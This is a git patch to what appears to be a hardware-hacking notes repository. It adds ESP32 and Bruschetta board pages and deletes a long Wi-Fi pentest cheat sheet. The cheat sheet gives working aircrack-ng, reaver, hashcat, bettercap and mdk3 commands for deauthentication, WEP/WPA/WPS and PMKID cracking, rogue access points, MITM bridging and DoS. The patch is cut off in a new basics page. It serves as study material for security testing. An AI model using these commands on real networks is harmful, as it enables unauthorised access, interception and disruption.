From b118b6412d05784d188cd0813086ffd4d0801d82 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 8 Feb 2024 21:18:57 +0100 Subject: [PATCH] Wifi - WPA EAP --- docs/firmware/firmware-dumping.md | 3 - docs/gadgets/bruschetta-board.md | 30 ++ docs/gadgets/esp32.md | 33 ++ docs/protocols/wifi.md | 692 -------------------------- docs/protocols/wifi/wifi-basics.md | 142 ++++++ docs/protocols/wifi/wifi-corporate.md | 112 +++++ docs/protocols/wifi/wifi-other.md | 122 +++++ docs/protocols/wifi/wifi-wep.md | 175 +++++++ docs/protocols/wifi/wifi-wpa.md | 220 ++++++++ 9 files changed, 834 insertions(+), 695 deletions(-) create mode 100644 docs/gadgets/bruschetta-board.md create mode 100644 docs/gadgets/esp32.md delete mode 100644 docs/protocols/wifi.md create mode 100644 docs/protocols/wifi/wifi-basics.md create mode 100644 docs/protocols/wifi/wifi-corporate.md create mode 100644 docs/protocols/wifi/wifi-other.md create mode 100644 docs/protocols/wifi/wifi-wep.md create mode 100644 docs/protocols/wifi/wifi-wpa.md diff --git a/docs/firmware/firmware-dumping.md b/docs/firmware/firmware-dumping.md index c82fe2bf..d27d7f6f 100644 --- a/docs/firmware/firmware-dumping.md +++ b/docs/firmware/firmware-dumping.md @@ -87,7 +87,6 @@ ## Dump Flash via SPI - * Using [flashrom/flashroom](https://github.com/flashrom/flashrom) ```ps1 sudo apt-get install build-essential pciutils usbutils libpci-dev libusb-dev libftdi1 libftdi-dev zlib1g-dev subversion libusb-1.0-0-dev @@ -213,8 +212,6 @@ $ binwalk -E fw ``` - - ## Encrypted firmware ![](https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/1581004558438-UJV08PX8O5NVAQ6Z8HXI/ke17ZwdGBToddI8pDm48kHSRIhhjdVQ3NosuzDMrTulZw-zPPgdn4jUwVcJE1ZvWQUxwkmyExglNqGp0IvTJZamWLI2zvYWH8K3-s\_4yszcp2ryTI0HqTOaaUohrI8PIYASqlw8FVQsXpiBs096GedrrOfpwzeSClfgzB41Jweo/Picture2.png?format=1000w) diff --git a/docs/gadgets/bruschetta-board.md b/docs/gadgets/bruschetta-board.md new file mode 100644 index 00000000..1b82ef38 --- /dev/null +++ b/docs/gadgets/bruschetta-board.md @@ -0,0 +1,30 @@ +# Bruschetta + +![](https://github.com/whid-injector/BRUSCHETTA-board/raw/main/images/Mode%202%20-%20SPI%20and%20I2C.jpg) + + +## Documentation + +* [whid-injector/BRUSCHETTA-Board](https://github.com/whid-injector/BRUSCHETTA-Board) - The Multi-Protocol Swiss-Army-Knife for Hardware Hackers (UART/JTAG/SPI/I2C) +* [whid-injector/PIZZAbite](https://github.com/whid-injector/PIZZAbite) - A cheaper and open-hardware version of the blasoned Sensepeek's PCBite for Hardware Hacking and DIY Hobbyists + +![](https://private-user-images.githubusercontent.com/26245612/270132857-2a87c37b-01fa-427c-87e4-f95feca5f2b6.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MDc0MDI1OTgsIm5iZiI6MTcwNzQwMjI5OCwicGF0aCI6Ii8yNjI0NTYxMi8yNzAxMzI4NTctMmE4N2MzN2ItMDFmYS00MjdjLTg3ZTQtZjk1ZmVjYTVmMmI2LmpwZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDAyMDglMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwMjA4VDE0MjQ1OFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTRjYWJhMGMwMDQwMDJlNjUxMzRhMWZlMjdmZTMwYjJjYmFkYmNhZjZiNzIzZWU0MTdiOTRhZTI3OTU0MDJkOTkmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.-cCmS3eF-ps8FtJwvRunCnxJS6DedYPc_DirD0Jl3-A) + +Bruschetta is the latest board to interact with Hardware, it is an upgraded version of these projects. + +* [whid-injector/Focaccia-Board](https://github.com/whid-injector/Focaccia-Board) - Multipurpose Breakout for the FT232H +* [whid-injector/Burtleina-Board](https://github.com/whid-injector/Burtleina-Board) - Yet another Multipurpose Breakout Board to hack hardware in a clean and easy way +* [whid-injector/NANDo-board](https://github.com/whid-injector/NANDo-board) - 2nd Generation of Multipurpose FTDI-based board for Hardware Hacking and IoT Security Testing + + +## Usage + +- Mode 2 (UART1+I2C+SPI-VCP): S1=ON and S2=OFF +- Mode 4 (UART1+JTAG): S1=ON and S2=ON + + +## References + +* [🍕PIZZAbite & BRUSCHETTA-board: The Hardware Hacking Toolkit you need for your own Lab! 🇮🇹 - WHID - We Hack In Disguise - 28 sept. 2023](https://www.youtube.com/watch?v=r7BOBPbq83M) +* [PIZZAbite & BRUSCHETTA-board: The Hardware Hackers tools you need to kickstart your own Lab! - WHID - We Hack In Disguise - SEP 28, 2023](https://www.whid.ninja/blog/pizzabite-bruschetta-board-the-hardware-hackers-tools-you-need-to-kickstart-your-own-lab) +* [Hacking IoT & RF Devices with BürtleinaBoard™ - Luca Bongiorni - Jul 27, 2020](https://lucabongiorni.medium.com/hacking-iot-rf-devices-with-bürtleinaboard-165e246b1ed0) \ No newline at end of file diff --git a/docs/gadgets/esp32.md b/docs/gadgets/esp32.md new file mode 100644 index 00000000..a05cd0fe --- /dev/null +++ b/docs/gadgets/esp32.md @@ -0,0 +1,33 @@ +# ESP32 + +## Tools + +* [espressif/esptool](https://github.com/espressif/esptool) - Espressif SoC serial bootloader utility +* [jmswrnr/esp32knife](https://github.com/jmswrnr/esp32knife) - Tools for ESP32 firmware dissection + + +## Flashing + +The ESP32 microprocessor uses the Xtensa instruction set, use `Tensilica Xtensa 32-bit little-endian` in Ghidra. + +* Dump the flash + ```ps1 + esptool -p COM7 -b 115200 read_flash 0 0x400000 flash.bin + ``` + +* Dissect the flash + ```ps1 + python esp32knife.py --chip=esp32 load_from_file ./flash.bin + ``` + +* Flash the new firmware + ```ps1 + # repair the checksum + python esp32fix.py --chip=esp32 app_image ./patched.part.3.factory + esptool -p COM7 -b 115200 write_flash 0x10000 ./patched.part.3.factory.fixed + ``` + +## References + +* [ESP32-reversing - BlackVS](https://github.com/BlackVS/ESP32-reversing) + diff --git a/docs/protocols/wifi.md b/docs/protocols/wifi.md deleted file mode 100644 index 9f744b39..00000000 --- a/docs/protocols/wifi.md +++ /dev/null @@ -1,692 +0,0 @@ -# Wifi - -### Tools - -* Wifite - https://github.com/derv82/wifite -* Wifite2 Rewrite - https://github.com/kimocoder/wifite2 -* Wifite2 Original - https://github.com/derv82/wifite2 - -### Linux Wireless Basics - -```powershell -AP_MAC="XX:XX:XX:XX:XX" # BSSID -VICTIM_MAC="XX:XX:XX:XX:XX" # VIC -ATTACKER_MAC="XX:XX:XX:XX:XX" # MON -AP_SSID="wifibox" # ESSID -SRC_ADDR="192.168.1.1" -DST_ADDR="192.168.1.255" -``` - -```powershell -# driver install -apt install realtek-rtl88xxau-dkms - -# network card recon -iwconfig -iw list -dmesg | grep 8187 # alfa card - -# Increase Wi-Fi TX Power -iw reg set B0 -iwconfig wlan0 txpower # txpower is 30 (usually) - -# find SSID and channel -iw dev wlan0 scan | grep SSID -iw dev wlan0 scan | egrep "DS\ Parameter\ set|SSID" -iwlist wlan0 scanning | egrep "ESSID|Channel" - -# monitor mode - start -airmon-ng start wlan0 -airmon-ng start wlan0 3 # only on a particular channel e.g: 3 - * Manual 1: iw dev wlan0 interface add mon0 type monitor - * Manual 2: iwconfig wlan0 mode monitor channel 3 -ifconfig mon0 up -# monitor mode - stop -airmon-ng stop mon0 - * Manual 1: iw dev wlan0 interface del mon0 - * Manual 2: iwconfig wlan0 mode managed -``` - -### Aircrack-ng Essentials - -```powershell -# check and kill processes that could interfere with our monitor mode -airmon-ng check -airmon-ng check kill -# pkill dhclient; pkill wpa_supplicant; pkill dhclient3 - -# list AP -airodump-ng mon0 -airodump-ng mon0 -c 3 # only on a particular channel e.g: 3 -airodump-ng mon0 -c 3 --bssid $AP_MAC -w clearcap # dump traffic - -# get our macaddress -macchanger -s mon0 -macchanger --show mon0 - -# replay and accelerate traffic -aireplay-ng - * -i interface - * -r file.pcap - -# check aireplay card compatibility -aireplay-ng -9 mon0 -> test injection -aireplay-ng -9 -i wlan1 mon0 -> test card to card injection - -# injection rate -iwconfig wlan0 rate 1M - -# Aircrack compatibility -http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#list_of_compatible_adapters -Alfa AWUS036H / TPLink WN722 -``` - -#### Fake authentication attack - -:warning: use it before each attack - -```powershell -airodump-ng -c 3 --bssid $AP_MAC -w wep1 mon0 - -# fake authentication = no arp -aireplay-ng -1 0 -e AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0 - * Might need a real $ATTACKER_MAC, observe traffic using airodump - > Association successful! :-) - -# fake authentication for picky AP -# Send keep-alive packets every 10 seconds -aireplay-ng -1 6000 -o 1 -q 10 -e -a -h - -# might need to fake your MAC ADDRESS first -``` - -#### Deauthentication attack - -> Force ARP packet to be sent. - -```powershell -aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0 - * -0 : 1 deauthentication, 0 unlimited - > Sending 64 directed DeAuth. -``` - -#### ARP Replay Attack - -Video: wifu-20.mp4 The attack listens for an ARP packet and then retransmits it back to the access point. This, in turn, causes the AP to repeat the ARP packet with a new IV. By collecting enough of these IVs Aircrack-ng can then be used to crack the WEP key. - -```powershell -aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0 - * ATTACKER_MAC if fake authentication launched - * CONNECTED_MAC if a client is associated - -# –x 1000 –n 1000 ? -# aireplay-ng -3 –x 1000 –n 1000 –b $AP_MAC -h $ATTACKER_MAC wlan0mon -# wait for ARP on the network -# alternatively you can de-auth some clients - -aircrack-ng –b -aircrack-ng -0 wep1.cap - * -0 : colored output -``` - -### Cracking WEP via a Client - -#### ARP Request Replay Attack - -> Attack the ACCESS POINT - -```powershell -airmon-ng start wlan0 3 # only a particular channel : 3 -airodump-ng mon0 -c 3 --bssid $AP_MAC -w arpreplay # dump traffic - -# Fake authentication for a more reliable attack -aireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0 - -# ARP replay attack -aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0 - -# Deauthentication -aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0 - -# Cracking -aircrack-ng arpreplay.cap -``` - -#### Interactive replay attack - -> Attack a client to force new packets 0841 attack, or interactive packet replay is a WEP attack that allows for packet injection when ARP replay is not available/working. - -```powershell -airmon-ng start wlan0 3 # only a particular channel : 3 -airodump-ng -c 3 --bssid $AP_MAC -w clearcap mon0 # dump traffic - -# fake authentication for a more reliable attack -aireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0 - -# interactive replay attack (min arp 68, max arp 86) -aireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # interactive - natural selection of a packet -aireplay-ng -2 -b $AP_MAC -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0 # interactive - force create a packet -# Packet selection (ARP packets met the characteristics): -# - APs will always repeat packets destined to the broadcast -# - The packet will have the ToDS (To Distribution System) bit set to 1 -# answer "y" multiple times - -# cracking require ~> 250000 IVs -aircrack-ng -0 -z -n 64 clientwep-01.cap - * -z: PTW attack - * -n: number of bits in the WEP key - -# backup file with an ARP packet -aireplay-ng -2 -r replay.cap mon0 -``` - -### Cracking WEP without a Client - -* Chopchop & Fragmentation attack => PRGA, generate more packets with weak IVs -* Need an AP configured with open system authentication - -Prerequisite: - -```powershell -# put into monitor mode on our desired channel -airmon-ng start wlan0 3 # only a particular channel : 3 -airodump-ng -c 3 --bssid $AP_MAC -w wepcrack mon0 # see no client - -# fake authentication attack with association timing (every 60s try to reassociate) -aireplay-ng -1 60 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0 # should see a client in airodump -# -1 6000 to avoid a time out. -``` - -#### Fragmentation attack - -> Goal: 1500 bytes of PRGA Atheros does not generate the correct packets unless the wireless card is set to the MAC address you are spoofing. - -```powershell -# attacker mac must be associated (fake auth) -# Press "Y" -aireplay-ng -5 -b $AP_MAC -h $ATTACKER_MAC mon0 - -# use our PRGA from the fragmentation attack to generate an ARP request -# SRC_ADDR: 192.168.1.100 -# DST_ADDR: 192.168.1.255, should not exist (broadcast address) -packetforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y frag.xor -w inject.cap -# -k: the destination IP i.e. in ARP, this is "Who has this IP" -# -l: the source IP i.e. in ARP, this is "Tell this IP" - -# check the packet -tcpdump -n -vvv -e -s0 -r inject.cap - -# inject our crafted packet -aireplay-ng -2 -r inject.cap mon0 - -# crack the WEP key -# Aircrack-ng will auto-update when new IVs are available -aircrack-ng -0 wepcrack - -# if 64-bit WEP is used, cracking time < 5 minutes -# switch to 128-bit keys after 600000 IVs -# use the `-f 4` after 2000000 -aircrack-ng -n 64 -``` - -#### KoreK Chopchop attack - -> Can't be used for every AP, might work when fragmentation fails Much slower than the fragmentation attack - -```powershell -# chopchop attack: -4 -# out decrypted: .cap -# out prga: .xor -# Press "Y" (choose a small packet) -aireplay-ng -4 -b $AP_MAC -h $ATTACKER_MAC mon0 - -# check the packet and find the network addresses -tcpdump -n -vvv -e -s0 -r inject.cap - -# use our PRGA from the fragmentation attack -# SRC_ADDR: 192.168.1.100 -# DST_ADDR: 192.168.1.255, should not exist (broadcast address) -packetforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y prga.xor -w chochop_out.cap - -# inject our crafted packet -aireplay-ng -2 -r chochop_out.cap mon0 - -# crack the WEP key -aircrack-ng -0 wepcrack -``` - -### Bypassing WEP Shared Key Authentication SKA - -> By default, most wireless drivers will attempt open authentication first. If open authentication fails, they will proceed to try shared authentication. - -Prerequisite: - -* Authentication: Shared Key -* When Fake Authentication => `AP rejects open-system authentication` - -```powershell -# put into monitor mode on our desired channel -airmon-ng start wlan0 3 # only a particular channel : 3 -airodump-ng -c 3 --bssid $AP_MAC -w sharedkey mon0 - -# deauthentication attack on the connected client -# airodump should display SKA under the AUTH column -# PRGA file will be saved as xxxx.xor -aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0 -# TO CHECK aireplay-ng -0 10 –a $AP_MAC -c $VICTIM_MAC mon0 - -# fake authentication attack with association timing (every 60s try to reassociate) -# should display switching to Shared Key Authentication -# If you are using a PRGA file obtained from a chopchop attack, make sure that it is at least 144 bytes long -# If you have "Part2: Association Not answering...(Step3)" -> spoof the mac address used to fake auth -aireplay-ng -1 60 -e $AP_SSID -y sharedkey.xor -b $AP_MAC -h $ATTACKER_MAC mon0 - -# ARP replay attack -aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0 - -# deauthentication attack on the connected client -# speed the ARP attack process using deauth -aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0 -# TO CHECK: aireplay-ng –-deauth 1 –a $AP_MAC -h wlan0mon - -# crack the WEP key -aircrack-ng sharedkey.cap -``` - -### Cracking WPA PSK - -#### Cracking WPA with John the Ripper - -```powershell -# put into monitor mode on our desired channel -airmon-ng start wlan0 3 # only a particular channel : 3 -airodump-ng -c 3 --bssid $AP_MAC -w wpajohn mon0 # see no client - -# deauthentication to get the WPA handshake (Sniffing should show the 4-way handshake) -aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0 - -# crack without john the ripper (-b ) -aircrack-ng -0 -w /pentest/passwords/john/password.lst wpajohn-01.cap -aircrack-ng -0 -w /pentest/passwords/john/password.lst wpajohn-01.cap -aircrack-ng -w password.lst,secondlist.txt wpajohn-01.cap # multiple dicts - -# crack with john the ripper - combine mangling rules with aircrack -# rules example to add in /pentest/passwords/john/john.conf -# $[0-9]$[0-9] -# $[0-9]$[0-9]$[0-9] -john --wordlist=/pentest/wireless/aircrack-ng/test/password.lst --rules --stdout | aircrack-ng -0 -e $AP_SSID -w - /root/wpajohn - -# generate PMKs for a faster cracking - Precomputed WPA Keys Database Attack -echo wifu > essid.txt -airolib-ng test.db --import essid essid.txt -airolib-ng test.db --stats -airolib-ng test.db --import passwd /pentest/passwords/john/password.lst -airolib-ng test.db --batch -airolib-ng test.db --stats -aircrack-ng -r test.db wpajohn-01.cap -# airolib-ng test.db --clean all - -# Not in lab - Convert to hccap to use with John Jumbo -aircrack-ng .cap -J -hccap2john .hccap > -john -``` - -#### Cracking WPA with coWPAtty - -> Better for PMK Rainbow table attacks - -```powershell -# put into monitor mode on our desired channel -airmon-ng start wlan0 3 # only a particular channel : 3 -airodump-ng -c 3 --bssid $AP_MAC -w wpacow mon0 # see no client - -# deauthentication to get the WPA handshake -aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0 - -# coWPAtty dictionary mode (slow) -cowpatty -r wpacow-01.cap -f /pentest/passwords/john/password.lst -2 -s $AP_SSID - -# coWPAtty rainbow table mode (fast) -genpmk -f /pentest/passwords/john/password.lst -d wifuhashes -s $AP_SSID -cowpatty -r wpacow-01.cap -d wifuhashes -2 -s $AP_SSID -``` - -#### Cracking WPA with Pyrit - -> Can use GPU - -```powershell -# put into monitor mode on our desired channel -airmon-ng start wlan0 3 # only a particular channel : 3 -airodump-ng -c 3 --bssid $AP_MAC -w wpapyrit mon0 # see no client - -# deauthentication to get the WPA handshake -aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0 - -# clean the cap and extract only good packets -pyrit -r wpapyrit-01.cap analyze -pyrit -r wpapyrit-01.cap -o wpastripped.cap strip - -# dictionary attack - slow ++ -pyrit -r wpapyrit-01.cap -i /pentest/passwords/john/password.lst -b $AP_MAC attack_passthrough - -# pre-computed hashes attack - slow on CPU -pyrit eval # pwds in database -pyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database -pyrit -e $AP_SSID create_essid -pyrit batch # generate -pyrit -r wpastripped.cap attack_db - -# gpu power attack - fast on GPU -pyrit list_cores -pyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database -pyrit -e $AP_SSID create_essid -pyrit batch -pyrit -r wpastripped.cap attack_db -``` - -#### WPA WPS Attack - -```powershell -airmon-ng start wlan0 -airodump-ng mon0 - -# Install -apt-get -y install build-essential libpcap-dev aircrack-ng pixiewps -git clone https://github.com/t6x/reaver-wps-fork-t6x -apt-get install reaver - -# Reaver integrated dumping tool (can also airodump-ng) -# Wash gives information about WPS being locked or not -# Locked WPS will have less success chances -wash -i mon0 - -# Launch Reaver -reaver -i mon0 -b $AP_MAC -vv -S -reaver -i mon0 -c -b $AP_MAC -p -vv -S -reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv - - -# Now using pixiexps, you can crack PIN offline -pixiewps -e -r -s -z -a -n -# Then, you can use the PIN with reaver to get to cleartext password -reaver -i -b -c -p - - -# Some manufacturers have implemented protections -# You can try different switches to bypass -# -L = Ignore locked state -# -N = Don't send NACK packets when errors are detected -# -d = delay X seconds between PIN attempts -# -T = set timeout period to X second (.5 means half second) -# -r = After X attemps, sleep for Y seconds -reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv -L -N -d 15 -T .5 -r 3:15 -``` - -> Message "WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying" -> AP is protected Message "WARNING: Receive timeout occured" -> AP is too far - -#### WPA PMKID Attack - -```powershell -INTERFACE=$(ifconfig | grep wlp | cut -d":" -f1) # mon0 - -# PMKID capture -# Note: Based on the noise on the wifi channel it can take some time to receive the PMKID. -# It can take a while to capture PKMID (several minutes++) -# We recommend running hcxdumptool up to 10 minutes before aborting. -# If an AP recieves our association request packet and supports sending -# sudo hcxdumptool -i wlan0mon -o outfile.pcapng --enable_status=1 -PMKID=$(sudo hcxdumptool -o test.pcapng -i $INTERFACE --enable_status --filtermode=2) -echo $PMKID|grep 'FOUND PMKID' &> /dev/null -hcxpcaptool -z test.16800 test.pcapng - -# Then convert the captured data to a suitable format for hashcat -# -E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs) -# -I retrieve identities from WiFi-traffic -# -U retrieve usernames from WiFi-traffic -# PMKID*MAC AP*MAC Station*ESSID -# 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a -hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng - -# Cracking the HASH -hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!' -hashcat -m 16800 -d 1 -w 3 myHashes rockyou.txt - -# Check clGetPlatformIDs(): CL_PLATFORM_NOT_FOUND_KHR -``` - -#### Cracking WPA with Bettercap - -```powershell -# install and update -go get github.com/bettercap/bettercap -cd $GOPATH/src/github.com/bettercap/bettercap -make build && sudo make install -sudo bettercap -eval "caplets.update; q" - -# run and recon the wifi APs -sudo bettercap -iface wlan0 -# this will set the interface in monitor mode and start channel hopping on all supported frequencies -> wifi.recon on -# we want our APs sorted by number of clients for this attack, the default sorting would be `rssi asc` -> set wifi.show.sort clients desc -# every second, clear our view and present an updated list of nearby WiFi networks -> set ticker.commands 'clear; wifi.show' -> ticker on -# use the good channel -> wifi.recon.channel 1 -``` - -**Bettercap WPA - Deauth and crack** - -```powershell -# use the bssid of the AP -> wifi.deauth e0:xx:xx:xx:xx:xx -/path/to/cap2hccapx /root/bettercap-wifi-handshakes.pcap bettercap-wifi-handshakes.hccapx -/path/to/hashcat -m 2500 -a3 -w3 bettercap-wifi-handshakes.hccapx '?d?d?d?d?d?d?d?d' -``` - -**Bettercap WPA - PMKID attack** - -```powershell -wifi.assoc all -/path/to/hcxpcaptool -z bettercap-wifi-handshakes.pmkid /root/bettercap-wifi-handshakes.pcap -/path/to/hashcat -m16800 -a3 -w3 bettercap-wifi-handshakes.pmkid '?d?d?d?d?d?d?d?d' -``` - -### Additional Aircrack-NG Tools - -#### Remove Wireless Headers - -```powershell -airdecap-ng -b $AP_MAC open-network.cap -* -dec.cap: stripped version of the file -``` - -#### Decrypt a WEP encrypted capture file - -```powershell -airdecap-ng -w $WEP_KEY wep.cap -``` - -#### Decrypt a WPA2 encrypted capture file - -```powershell -airdecap-ng -e $AP_SSID -p $WPA_PASSWORD tkip.cap -``` - -#### Remote Aircrack Suite - -```powershell -airmon-ng start wlan0 3 -airserv-ng -p 1337 -c 3 -d mon0 -airodump-ng -c 3 --bssid $AP_MAC $HOST:$PORT -``` - -#### Wireless Intrusion Detection System - -> Require wireless key and bssid - -```powershell -airmon-ng start wlan0 3 - -# create the at0 interface -airtun-ng -a $AP_MAC -w $WEP_KEY mon0 -# the interface will auto decrypt packets -``` - -### Wireless Reconnaissance - -> Use CSV file from airodump - -CAPR Graph - -```powershell -airgraph-ng -i wifu-01.csv -g CAPR -o wifu-capr.png -# color -- green: wpa -- yellow: wep -- red: open -- black: unknown -``` - -CPG - Client Probe Graph - -```powershell -airgraph-ng -i wifu-01.csv -g CPG -o wifu-cpg.png -``` - -### Kismet - -```powershell -kismet -[enter][enter] -[tab][close] - -# Select a source and begin a monitoring -Kismet > Add source > wlan0 > Add - -.nettxt: data -.pcapdump: wireshark format -``` - -```powershell -# giskismet: kismet inside a SQL database -> require a GPS receiver - -gpsd -n -N -D4 /dev/ttyUSB0 --N : foreground --D : debugging level - -# kismet will gather SSID and GPS location -giskismet -x kismet.netxml - -# generate a kml file (Google Earth) -giskismet -q "select * from wireless" -o allaps.kml -giskismet -q "select * from wireless where Encryption='WEP'" -o wepaps.kml -``` - -### Rogue Access Point - -#### WPA handshake - -```powershell -airmon-ng start wlan0 3 -airodump-ng -c 3 -d $ATTACKER_MAC -w airbase mon0 - -# basic fake AP -airbase-ng -c 3 -e $AP_SSID mon0 -airbase-ng -c 3 -e $AP_SSID -z 4 -W 1 mon0 --W 1 : WEP - -# get a WPA handshake if the client connect -aircrack-ng -w /pentest/passwords/john/password.lst airbase-01.cap -``` - -#### Karmetasploit - -```powershell -# install a dhcp server -apt install dhcp3-server - -airmon-ng start wlan0 3 -airbase-ng -c 3 -P -C 60 -e $AP_MAC -v mon0 --P: respond to all probes -ifconfig at0 up 10.0.0.1/24 - -mkdir -p /var/run/dhcpd -chown -R dhcpd:dhcpd /var/run/dhcpd -touch /var/lib/dhcp3/dhcpd.leases - -"CONF DHCP FROM VIDEO 75" > /tmp/dhcpd.conf - -touch /tmp/dhcp.log -chown -R dhcpd:dhcpd /tmp/dhcp.log -dhcpd3 -f -cf /tmp/dhcpd.conf -pf /var/run/dhcpd/pid -lf /tmp/dhcp/log at0 - -karma.rc from metasploit -# comment the first 2 lines (load sqlite) -msfconsole -r /root/karma.rc -``` - -#### Access Point MITM - -```powershell -airmon-ng start wlan0 3 -airbase-ng -c 3 -e $AP_SSID_SPOOFED mon0 - -# create a bridged interface -# apt-get install bridge-utils -brctl addbr hacker -brctl addif hacker eth0 -brctl addif hacker at0 - -# assign IP addresses -ifconfig eth0 0.0.0.0 up -ifconfig at0 0.0.0.0 up -ifconfig hacker 192.168.1.8 up - -# enable IP forwarding -echo 1 > /proc/sys/net/ipv4/ip_forward - -# mitm tools -driftnet -ettercap -G -Sniff > Unified sniffing > Hacker Interface -``` - -### Other things - -```powershell -# Find Hidden SSID -aireplay-ng -0 20 –a -c mon0 - -# Mac Filtering -macchanger –-mac wlan0mon -aireplay-ng -3 –b -h wlan0mon -# MAC CHANGER -ifconfig wlan0mon down -macchanger –-mac wlan0mon -ifconfig wlan0mon up - -# Deauth Global -aireplay-ng -0 0 -e hacklab -c FF:FF:FF:FF:FF:FF wlan0mon - -# Authentication DoS Mode -mdk3 wlan0mon a -a $AP_MAC - -# Tshark - Filter and dislay data -tshark -r Captura-02.cap -Y "eapol" 2>/dev/null -tshark -i wlan0mon -Y "wlan.fc.type_subtype==4" 2>/dev/null -tshark -r Captura-02.cap -Y "(wlan.fc.type_subtype==0x08 || wlan.fc.type_subtype==0x05 || eapol) && wlan.addr==20:34:fb:b1:c5:53" 2>/dev/null - -# Convert .cap with handshake to .hccap -aircrack-ng -J network network.cap -``` - -### References - -* [Wireless Penetration Testing Cheat Sheet [UPDATED – 2022]](https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/) -* [Aireplay 0841 Attack – Introduction](https://www.doyler.net/security-not-included/aireplay-0841-attack) -* [Preparación para el OSWP (by s4vitar)](https://gist.github.com/s4vitar/3b42532d7d78bafc824fb28a95c8a5eb) \ No newline at end of file diff --git a/docs/protocols/wifi/wifi-basics.md b/docs/protocols/wifi/wifi-basics.md new file mode 100644 index 00000000..753ca470 --- /dev/null +++ b/docs/protocols/wifi/wifi-basics.md @@ -0,0 +1,142 @@ +# Wifi - Basics + +## Tools + +* [aircrack-ng/aircrack-ng](https://github.com/aircrack-ng/aircrack-ng) - WiFi security auditing tools suite +* [kimocoder/wifite2](https://github.com/kimocoder/wifite2) - Rewrite of the popular wireless network auditor, "wifite" - original by @derv82 +* [derv82/wifite2](https://github.com/derv82/wifite2) - Rewrite of the popular wireless network auditor, "wifite" +* [derv82/wifite](https://github.com/derv82/wifite) - Wifite is an automated wireless attack tool. + + +## Linux Wireless Basics + +```powershell +AP_MAC="XX:XX:XX:XX:XX" # BSSID +VICTIM_MAC="XX:XX:XX:XX:XX" # VIC +ATTACKER_MAC="XX:XX:XX:XX:XX" # MON +AP_SSID="wifibox" # ESSID +SRC_ADDR="192.168.1.1" +DST_ADDR="192.168.1.255" +``` + +```powershell +# driver install +apt install realtek-rtl88xxau-dkms + +# network card recon +iwconfig +iw list +dmesg | grep 8187 # alfa card + +# Increase Wi-Fi TX Power +iw reg set B0 +iwconfig wlan0 txpower # txpower is 30 (usually) + +# find SSID and channel +iw dev wlan0 scan | grep SSID +iw dev wlan0 scan | egrep "DS\ Parameter\ set|SSID" +iwlist wlan0 scanning | egrep "ESSID|Channel" + +# monitor mode - start +airmon-ng start wlan0 +airmon-ng start wlan0 3 # only on a particular channel e.g: 3 + * Manual 1: iw dev wlan0 interface add mon0 type monitor + * Manual 2: iwconfig wlan0 mode monitor channel 3 +ifconfig mon0 up +# monitor mode - stop +airmon-ng stop mon0 + * Manual 1: iw dev wlan0 interface del mon0 + * Manual 2: iwconfig wlan0 mode managed +``` + + +## Aircrack-ng Essentials + +```powershell +# check and kill processes that could interfere with our monitor mode +airmon-ng check +airmon-ng check kill +# pkill dhclient; pkill wpa_supplicant; pkill dhclient3 + +# list AP +airodump-ng mon0 +airodump-ng mon0 -c 3 # only on a particular channel e.g: 3 +airodump-ng mon0 -c 3 --bssid $AP_MAC -w clearcap # dump traffic + +# get our macaddress +macchanger -s mon0 +macchanger --show mon0 + +# replay and accelerate traffic +aireplay-ng + * -i interface + * -r file.pcap + +# check aireplay card compatibility +aireplay-ng -9 mon0 -> test injection +aireplay-ng -9 -i wlan1 mon0 -> test card to card injection + +# injection rate +iwconfig wlan0 rate 1M + +# Aircrack compatibility +http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#list_of_compatible_adapters +Alfa AWUS036H / TPLink WN722 +``` + + +### Fake authentication attack + +:warning: use it before each attack + +```powershell +airodump-ng -c 3 --bssid $AP_MAC -w wep1 